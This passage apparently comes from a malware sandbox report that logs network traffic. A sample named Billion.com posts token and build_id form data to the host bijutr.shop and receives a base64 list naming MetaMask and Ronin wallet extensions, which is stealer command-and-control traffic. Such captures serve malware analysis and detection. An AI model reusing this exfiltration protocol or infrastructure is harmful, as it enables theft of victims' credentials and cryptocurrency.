                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:50 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 37 59 43 42 49 45 33 37 59 43 42 41 49 45 43 32 36 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 37 59 43 42 49 45 33 37 59 43 42 41 49 45 43 32 36 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 37 59 43 42 49 45 33 37 59 43 42 41 49 45 43 32 36 46 43 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: ------7YCBIE37YCBAIEC26FCBContent-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------7YCBIE37YCBAIEC26FCBContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------7YCBIE37YCBAIEC26FCBCont
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:27:51 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:51 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        9192.168.2.649834188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:53 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----YCT0HVAS26FUAI5PZ5X4
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 6901
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:53 UTC6901OUTData Raw: 2d 2d 2d 2d 2d 2d 59 43 54 30 48 56 41 53 32 36 46 55 41 49 35 50 5a 35 58 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 59 43 54 30 48 56 41 53 32 36 46 55 41 49 35 50 5a 35 58 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 59 43 54 30 48 56 41 53 32 36 46 55 41 49 35 50 5a 35 58 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: ------YCT0HVAS26FUAI5PZ5X4Content-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------YCT0HVAS26FUAI5PZ5X4Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------YCT0HVAS26FUAI5PZ5X4Cont
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:27:53 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:54 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        10192.168.2.649835188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:54 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----6PH4O89RQIEU37YMYCJ5
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 489
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:54 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 36 50 48 34 4f 38 39 52 51 49 45 55 33 37 59 4d 59 43 4a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 36 50 48 34 4f 38 39 52 51 49 45 55 33 37 59 4d 59 43 4a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 36 50 48 34 4f 38 39 52 51 49 45 55 33 37 59 4d 59 43 4a 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: ------6PH4O89RQIEU37YMYCJ5Content-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------6PH4O89RQIEU37YMYCJ5Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------6PH4O89RQIEU37YMYCJ5Cont
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:27:55 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:55 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                        11192.168.2.64984120.198.119.84443
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:56 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 31 2f 77 31 65 5a 6a 72 58 45 79 6a 66 6a 54 4b 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 34 62 36 62 64 36 62 65 33 37 62 37 64 65 31 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: CNT 1 CON 305MS-CV: 1/w1eZjrXEyjfjTK.1Context: 54b6bd6be37b7de1
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:56 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:56 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 31 2f 77 31 65 5a 6a 72 58 45 79 6a 66 6a 54 4b 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 34 62 36 62 64 36 62 65 33 37 62 37 64 65 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 66 33 63 4c 59 5a 74 57 55 43 4a 71 41 63 32 53 58 55 68 66 70 6a 5a 33 66 36 65 53 46 4b 64 6c 6d 68 64 33 31 75 6d 37 2f 73 33 47 51 59 34 79 33 62 4a 6a 34 71 7a 42 72 39 34 6e 69 75 51 39 4b 4b 61 52 44 4a 61 76 78 76 6e 37 75 51 65 36 43 72 53 74 31 76 46 51 6d 4d 42 6d 59 48 62 47 68 56 38 4b 71 4a 35 5a 64 4d 79 72 70
                                                                                                                                                                                                                                                                                                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 1/w1eZjrXEyjfjTK.2Context: 54b6bd6be37b7de1<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAf3cLYZtWUCJqAc2SXUhfpjZ3f6eSFKdlmhd31um7/s3GQY4y3bJj4qzBr94niuQ9KKaRDJavxvn7uQe6CrSt1vFQmMBmYHbGhV8KqJ5ZdMyrp
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:56 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 31 2f 77 31 65 5a 6a 72 58 45 79 6a 66 6a 54 4b 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 34 62 36 62 64 36 62 65 33 37 62 37 64 65 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: 1/w1eZjrXEyjfjTK.3Context: 54b6bd6be37b7de1<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:57 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:57 UTC58INData Raw: 4d 53 2d 43 56 3a 20 4b 4e 56 47 6a 31 79 46 67 30 6d 54 65 72 69 44 43 63 78 55 69 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                        Data Ascii: MS-CV: KNVGj1yFg0mTeriDCcxUiQ.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        12192.168.2.649852142.250.181.68443320C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:58 UTC603OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlaHLAQj6mM0BCIWgzQEI3L3NAQiQys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:27:58 GMT
                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                        Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-ZcKnd_S529o8QpWC2cvCTQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                        Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                        Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC124INData Raw: 38 30 30 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 63 6f 6c 6c 65 67 65 20 66 6f 6f 74 62 61 6c 6c 20 70 6c 61 79 6f 66 66 22 2c 22 6a 61 6d 65 73 20 67 75 6e 6e 20 66 6c 61 73 68 22 2c 22 62 61 72 73 74 6f 6f 6c 20 73 70 6f 72 74 73 20 62 61 6c 74 69 6d 6f 72 65 20 70 69 7a 7a 61 22 2c 22 6e 69 6e 74 65 6e 64 6f 20 73 77 69 74 63 68 20 32 20 63 6f 6e 73 6f 6c 65 22 2c 22
                                                                                                                                                                                                                                                                                                        Data Ascii: 800)]}'["",["college football playoff","james gunn flash","barstool sports baltimore pizza","nintendo switch 2 console","
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC1390INData Raw: 6c 61 6e 65 20 6b 69 66 66 69 6e 22 2c 22 70 61 72 69 73 20 65 69 66 66 65 6c 20 74 6f 77 65 72 20 66 69 72 65 22 2c 22 66 69 6e 63 65 6e 20 62 6f 69 20 72 65 70 6f 72 74 69 6e 67 20 69 6e 6a 75 6e 63 74 69 6f 6e 22 2c 22 74 68 65 20 6f 64 79 73 73 65 79 20 66 69 6c 6d 20 63 68 72 69 73 74 6f 70 68 65 72 20 6e 6f 6c 61 6e 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f
                                                                                                                                                                                                                                                                                                        Data Ascii: lane kiffin","paris eiffel tower fire","fincen boi reporting injunction","the odyssey film christopher nolan"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","goo
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC541INData Raw: 56 70 71 53 30 4e 48 64 55 74 77 56 47 6c 70 56 47 70 52 57 55 46 34 4f 48 70 53 51 56 4e 57 52 44 4d 32 56 6e 52 30 4f 57 39 73 65 47 30 79 62 32 70 69 59 55 5a 31 62 6e 70 6f 57 6c 59 72 62 6e 42 35 4c 7a 64 55 4e 46 4e 55 62 46 52 46 64 55 78 79 5a 30 67 79 64 58 64 34 53 53 74 47 52 6b 68 48 5a 45 64 31 4b 7a 52 4e 4e 43 74 42 4e 55 4e 75 65 6c 6c 31 4f 46 4a 46 65 54 4e 76 56 57 6c 5a 65 56 68 47 51 55 5a 30 53 45 56 55 62 6d 56 34 61 6b 67 77 65 44 6c 4c 63 58 52 61 56 6b 78 68 53 57 4e 56 62 7a 63 76 51 55 70 35 55 6e 6c 57 57 45 6c 79 51 56 4d 77 56 57 74 42 62 6e 52 57 53 48 5a 58 64 58 4e 5a 62 6b 78 34 4d 33 52 69 57 6a 5a 59 57 56 6c 70 55 48 67 72 52 45 78 68 55 54 67 79 55 30 5a 69 61 6d 63 7a 61 47 74 6a 63 57 6f 7a 59 6c 70 31 4d 6c 51 30
                                                                                                                                                                                                                                                                                                        Data Ascii: VpqS0NHdUtwVGlpVGpRWUF4OHpSQVNWRDM2VnR0OW9seG0yb2piYUZ1bnpoWlYrbnB5LzdUNFNUbFRFdUxyZ0gydXd4SStGRkhHZEd1KzRNNCtBNUNuell1OFJFeTNvVWlZeVhGQUZ0SEVUbmV4akgweDlLcXRaVkxhSWNVbzcvQUp5UnlWWElyQVMwVWtBbnRWSHZXdXNZbkx4M3RiWjZYWVlpUHgrRExhUTgyU0ZiamczaGtjcWozYlp1MlQ0
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC89INData Raw: 35 33 0d 0a 65 69 74 53 64 45 68 48 55 54 51 72 4e 6e 56 4a 4e 48 42 43 53 32 35 47 4e 6a 5a 69 4d 6d 64 44 5a 6e 41 78 52 6c 42 58 54 33 68 6c 4d 57 52 70 4f 55 46 6b 53 32 73 34 53 46 46 71 62 55 38 35 52 55 63 30 64 55 4e 45 64 57 74 77 65 6e 4a 70 61 54 6b 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 53eitSdEhHUTQrNnVJNHBCS25GNjZiMmdDZnAxRlBXT3hlMWRpOUFkS2s4SFFqbU85RUc0dUNEdWtwenJpaTk
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC1354INData Raw: 35 34 33 0d 0a 31 4d 6b 46 32 56 33 70 43 4f 46 45 34 62 45 31 31 52 57 73 76 4d 55 78 42 55 47 73 76 64 6c 52 36 56 44 6c 34 4e 6a 56 79 56 6b 52 43 59 33 6c 56 4e 46 42 6a 56 58 41 34 52 6d 74 68 59 58 4e 51 65 46 70 4c 54 45 35 7a 4c 30 6c 69 52 58 52 31 4d 33 46 73 63 55 52 54 53 46 46 43 62 46 68 56 4f 57 6c 6b 54 6b 39 6d 56 32 77 7a 59 56 63 33 64 6c 49 33 54 6b 56 71 65 54 4d 30 63 32 67 78 4f 54 52 32 53 6c 56 33 62 6c 4a 4a 55 30 4e 72 4e 6a 5a 6a 4f 48 42 36 4f 46 42 54 62 56 63 78 55 30 64 59 4d 6c 42 43 55 48 55 34 53 57 39 6a 4d 32 74 79 56 32 64 4c 55 31 52 72 59 55 56 49 55 32 78 69 4d 6d 68 58 61 56 4e 31 4e 30 31 54 5a 55 6c 71 64 32 70 70 51 58 6c 35 62 30 6b 7a 56 58 42 34 63 6d 70 49 56 46 5a 53 4c 31 6c 79 54 56 4e 6c 64 32 56 6c 59
                                                                                                                                                                                                                                                                                                        Data Ascii: 5431MkF2V3pCOFE4bE11RWsvMUxBUGsvdlR6VDl4NjVyVkRCY3lVNFBjVXA4RmthYXNQeFpLTE5zL0liRXR1M3FscURTSFFCbFhVOWlkTk9mV2wzYVc3dlI3TkVqeTM0c2gxOTR2SlV3blJJU0NrNjZjOHB6OFBTbVcxU0dYMlBCUHU4SW9jM2tyV2dLU1RrYUVIU2xiMmhXaVN1N01TZUlqd2ppQXl5b0kzVXB4cmpIVFZSL1lyTVNld2VlY
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        13192.168.2.649853142.250.181.68443320C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:58 UTC506OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlaHLAQj6mM0BCIWgzQEI3L3NAQiQys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Version: 705503573
                                                                                                                                                                                                                                                                                                        Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                        Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                        Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:27:59 GMT
                                                                                                                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                                                                                                                        X-XSS-Protection: 0
